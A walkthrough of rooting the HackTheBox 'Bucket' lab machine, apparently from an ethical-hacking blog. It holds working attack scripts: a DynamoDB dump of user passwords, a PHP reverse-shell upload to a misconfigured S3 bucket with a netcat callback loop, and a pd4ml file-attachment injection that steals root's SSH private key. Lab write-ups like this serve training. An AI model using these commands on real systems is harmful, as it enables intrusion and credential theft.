Bucket HackTheBox WalkThrough

This is Bucket HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Bucket HackTheBox machine. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.212 and difficulty Medium assigned by its maker.

First of all connect your PC with HackTheBox VPN and make sure your connectivity with Bucket machine by pinging its IP 10.10.10.212. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used nmap for this task and the result is given below:-

Scanning

$ sudo nmap -sC -sV -oN bucket.nmap 10.10.10.212

Nmap revealed port number 22 & 80 as open. OpenSSH is running on port 22 and Apache2 webserver is running on port 80. Since apache2 is running on port 80 so we should have some website running over URL http://10.10.10.212. After going to this URL found redirection to http://bucket.htb. So, before proceeding for further enumeration we have to add bucket.htb pointing to IP 10.10.10.212 in our hosts file which is located at directory /etc/. Added this record in my hosts file.

Host File After Modification

$ cat /etc/hosts

Ongoing to http://bucket.htb found Bucket Advertising Platform heading and an email address [email protected]. There is no use of email here because we don’t have port 25, 110 and 143 open.

Tried to check the page-source of this page and got a new subdomain s3.bucket.htb. So before going further added this subdomain to my hosts file.

Host File after Modification

$ cat /etc/hosts

After going to URL http://s3.bucket.htb  found {Status: running}. It appears that something is running. Since it is S3 and also a hint to bucket so it must be AWS (Amazon Web Services) S3 Bucket. Although we come to know that it is using S3 Bucket but we don’t have anything to enumerate on so nothing left accept directory bruteforcing and fuzzing.

Directory Bruteforcing

$ sudo dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://s3.bucket.htb/ -t 50 -e all | tee raft-medium.out

Directory bruteforcing found a folder shell. After going to this folder at URL http://s3.bucket.htb/shell/ found DynamoDB JavaScript Shell. After some googling found a way by which we can enumerate content of table users from this Shell. Check this link at StackOverflow. Simply put the following code into the editor and click on run to execute the code. You will get details of all the items inside the table users.

var dynamodb = new AWS.DynamoDB({region: 'us-east-1',endpoint: "http://s3.bucket.htb"});var tableName = "users";var params = {TableName: tableName,Select: "ALL_ATTRIBUTES"};function doScan(response) {if (response.error) ppJson(response.error); // an error occurredelse {    ppJson(response.data); // successful response    // More data.  Keep calling scan.    if ('LastEvaluatedKey' in response.data) {        response.request.params.ExclusiveStartKey = response.data.LastEvaluatedKey;        dynamodb.scan(response.request.params)            .on('complete', doScan)            .send();    }}}console.log("Starting a Scan of the table");dynamodb.scan(params).on('complete', doScan).send();

From the above output we have found credentials. Mgmt: Management@#1@#, Cloudadm: Welcome123!, Sysadm: n2vM-<_K_Q:.Aa2

Didn’t know which is right creds for our SSH. Tried to SSH with each of them one by one and even tried to test for all the combinations for SSH using hydra (an online brute forcer) but no any valid SSH credential found. Here our enumerated credentials are useless till now. Anyway, added this credentials to my cherry tree notes, may be it will be useful at some other point in further enumeration.

After some further enumeration found a way by which we can enumerate all the webserver and its files inside the bucket using awscli aws command line tool. To use awscli tool we have to first configure it with a valid AWS credentials. The required credentials are AWS Access Key ID, AWS Secret Access Key, Default region name & Default output format ( to install awscli tool use $sudo apt install awscli ). Here, the aws S3 bucket is misconfigured and anyone with any fake credential can access the webserver running on this S3 bucket.

Using fake credential I was also able to access the webserver running in this bucket. Even I could upload a reverse shell onto this webserver and could execute the reverse shell to get connection back to my machine.

To get reverse shell do the following things.

1. Configure the awscli for first use using fake credential. For more info check this article at amazon.

Accessing AWS Bucket Through Aws CLI

$ aws configure

AWS Access Key ID: AKIAI44QH8DHBEXAMPLE

AWS Secret Access Key: je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY

Default region name: us-east-1

Default output format: text

2. List the content of S3 bucket at http://s3.bucket.htb

$ aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

Adserver webserver is running in the bucket at s3.bucket.htb.

3. List the content in the adserver bucket.

$ aws s3 ls --recursive --human-readable s3://adserver --endpoint-url http://s3.bucket.htb/

4. Copy your php-reverse-shell script in the image folder using cp command of aws [don’t forget to change the IP address with your tun0 IP in php-reverse-shell script. The php shell can be found in your Kali OS at directory /usr/share/webshells/php/].

$ aws s3 cp ~/HTB/Boxes/Bucket/shell.php s3://adserver/images/shell.php --endpoint-url http://s3.bucket.htb/

5. List the file of images folder to confirm that our reverse shell is uploaded in the adserver bucket or not.

$ aws s3 ls s3://adserver/images/ --endpoint-url http://s3.bucket.htb/

6. Start netcat listener on your kali machine.

$ nc -nvlp 1234

7. Execute the Shell

$ curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.php

There is probably a cron job that delete the shell as soon as we upload it. So I have created a script that do this job very fast. So you can get shell using the below script.

Note: You may require to run this script 2 to 3 times to get shell. Before running this script start your netcat listener on the specified port which you have mentioned in your shell script.

#!/bin/bashexport AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEexport AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYecho "List Files."aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver## Copying  file from local computer to Bucketaws --endpoint-url http://s3.bucket.htb/ s3 cp shell.php s3://adserver/images/shell.phpecho "Checking if file is uploaded"aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver# Checking if file exists on web serverecho "Checking on s3.bucket"curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.phpresp=404# Executing the shell multiple time until get response code 200while [[ $resp -eq 404 ]]; do    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null  http://bucket.htb/images/shell.php)    echo $resp    sleep 0.1;done

$ bash exploit.sh

We have got user shell as user www-data. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ ^Z # CTRL+Z To background the shell

$ stty raw -echo

$ fg # Plus two times enter to foreground the shell

$ stty rows 38 columns 116

We have three credentials enumerated earlier. Let us try to switch to user roy by using them one by one, roy: n2vM-<_K_Q:.Aa2 is the valid creds. So let us switch to roy. This is also a valid SSH credential. In case you lose your shell then use this credential to get back into your SSH shell.

Switching to User Roy

$ su roy

Password: n2vM-<_K_Q:.Aa2

$ whoami

Capture User Flag

$ cd ~

$ cat user.txt

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh (a post exploitation enumeration script) on Bucket machine. It finds information of all the potential PrivEsc Vectors that can be used to escalate privilege to root.

Finding PrivEsc Vector

Linpeas suspected directory /var/www/bucket-app/aws/ have something suspicious that can be used to escalate privilege. Didn’t know exactly why linpeas is suspecting it to be our potential PrivEsc vector. Let us check it manually and confirm whether we would get root or not using this.

index.php file inside directory /var/www/bucket-app/ gave some information about a table alerts and some internal ports 4566 as an endpoint. Since bucket-app is placed inside public folder and apache2 is running there may be chance of internal webserver running on this port. We will confirm it by using $netstat command.

$ netstat -punta revealed some unique ports 4566 & 8000 are listening locally.

To access the services running over these ports we have to port forward these services to our local machine so that we can access them in our web browser. We have SSH credential of user roy which is roy : n2vM-<_K_Q:.Aa2, so we can Local Port Forward to our local machine to access these services. Let us perform local port forwarding.

Performing Local Port Forwarding

$ ssh -L 8000:127.0.0.1:8000 -L 4566:127.0.0.1:4566 [email protected]

~n2vM-<_K_Q:.Aa2

$ ss -lnpt # Check for listening port on your local machine

We have successfully forwarded the port to our Kali machine as can be confirmed by $ss –lnpt command on our Kali machine. Now we can check the services running on port 8000 and 4566 in our web browser by visiting the URL http://127.0.0.1:8000/  & http://127.0.0.1:4566 .

Under construction is shown at the URL http://127.0.0.1:8000.

Running status is shown at URL http://127.0.0.1:4566 . Let us again check the file index.php at /var/www/bucket-app/ for more information.

According to this file it is making POST request after accepting some data inside the table alerts. This table also requests some additional values like Ransomeware, get_alerts() and file in Post Data . We will exploit this feature to get private SSH key of root user. For more info about how this page is functioning you can check this article.

So, to exploit this feature and to get root user’s private key I did the following things.

1. Created a new DynamoDB table alerts.

2. Inserted the values as requested along with our payload in the table alerts.

3. At last made POST requests with some additional data as requested.

I have created a script to perform this job. Just copy the script in a file and save it by extension .sh and execute it.

#!/bin/bashecho "Creating New Table"echo "======================================"# Creating New Table alertsaws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566echo "======================================"echo "Writing Data to alerts and putting in the file attacked.txt"# Writing Data to table alertsaws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566echo "======================================"echo "Making Post Requests"# Making Post Request with data "action=get_alerts"curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/index.phpecho "Done"echo "Go to http://127.0.0.1:8000/files/ and download the attachment"

$ bash command.sh

Let us go to URL http://127.0.0.1/files/result.pdf to download the attachment by clicking on the pin icon.

The attachment is id_rsa key of root user.

$ cat ~/Downloads/id_rsa

Let us use this SSH private key to login as root to bucket machine.

Getting Root Shell

$ cp ~/Downloads/id_rsa .

$ chmod 400 id_rsa

$ ssh -i id_rsa [email protected]

# whoami && id

We are root now let us capture root flag.

Capture Root Flag

#cat root.txt

This was how I rooted to the Bucket HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/ .